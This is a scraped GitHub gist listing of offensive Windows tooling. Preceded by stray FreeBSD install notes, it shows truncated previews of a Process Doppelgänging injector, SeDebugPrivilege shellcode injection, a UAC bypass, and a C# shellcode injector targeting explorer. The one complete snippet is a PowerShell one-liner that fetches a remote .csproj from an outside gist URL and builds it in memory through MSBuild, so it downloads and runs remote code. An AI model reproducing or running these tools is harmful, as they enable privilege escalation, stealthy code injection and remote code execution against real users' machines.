- Install 12.0 (or later)
- Install drm-next-kmod from ports - do not install xf86-video-intel
- Recognized by default, need to enable iwm in rc.conf
Ronan Kervella lesnuages
lesnuages
/ inject.c
Created
July 11, 2019 09:06
— forked from hfiref0x/inject.c
Process Doppelgänging
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Ref = src | |
| // https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
| // | |
| // Credits: | |
| // Vyacheslav Rusakov @swwwolf | |
| // Tom Bonner @thomas_bonner | |
| // | |
| #include <Windows.h> |
lesnuages
/ getsystem.go
Created
April 17, 2019 17:20
Inject shellcode in a system process, leveraging SeDebugPrivilege
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "io/ioutil" | |
| "log" | |
| "net/http" | |
| "os" | |
| "runtime" | |
| "syscall" | |
| "unsafe" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // UAC bypass ported from https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation/blob/master/SluiFileHandlerHijackLPE/SluiFileHandlerHijackLPE.cpp | |
| package main | |
| import ( | |
| "syscall" | |
| "time" | |
| "unsafe" | |
| "golang.org/x/sys/windows/registry" | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "os/exec" | |
| "syscall" | |
| "time" | |
| "unsafe" | |
| ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "syscall" | |
| "unsafe" | |
| ) | |
| // getInfo retrieves a specified type of information about an access token. |
lesnuages
/ ShellcodeTest.cs
Created
January 21, 2019 12:36
— forked from TheWover/ShellcodeTest.cs
Dirty but working C# remote shell code injector. Injects into explorer using the architecture of the platform. Modified from several random sources and cleaned up a bit.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest |
lesnuages
/ Build_In_Memory_CSharp_Project.txt
Created
June 22, 2018 08:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); | |
| $proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/bohops/a29a69cf127ffb0e37622d25b9f79157/raw/35fa4c5a0d2db037220f224b5c4c269ea243b3bd/test.csproj"); | |
| $e=new-object Microsoft.Build.Evaluation.Project($proj); | |
| $e.Build(); |
NewerOlder